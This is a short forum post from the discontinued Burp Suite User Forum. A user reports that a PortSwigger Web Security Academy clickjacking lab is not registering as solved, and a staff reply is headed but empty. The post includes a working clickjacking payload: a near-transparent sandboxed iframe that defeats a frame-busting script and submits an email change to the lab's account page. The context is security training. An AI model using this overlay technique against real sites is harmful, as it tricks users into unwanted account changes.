The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Clickjacking with a frame buster script Solve is failing

Joshua | Last updated: Aug 05, 2024 11:13PM UTC

This lab is not solving. Tried in Chrome and Firefox. <style> iframe { position:relative; width:700px; height: 500px; opacity: 0.000000001; z-index: 2; } div { position:absolute; top:450px; left:80px; z-index: 1; } </style> <div>Click me</div> <iframe sandbox="allow-forms" src="https://0a3d007d0336212a80c00432005300a9.web-security-academy.net/my-account?email=Dankula@pwned.com"></iframe>

Michelle, PortSwigger Agent | Last updated: Aug 06, 2024 02:22PM UTC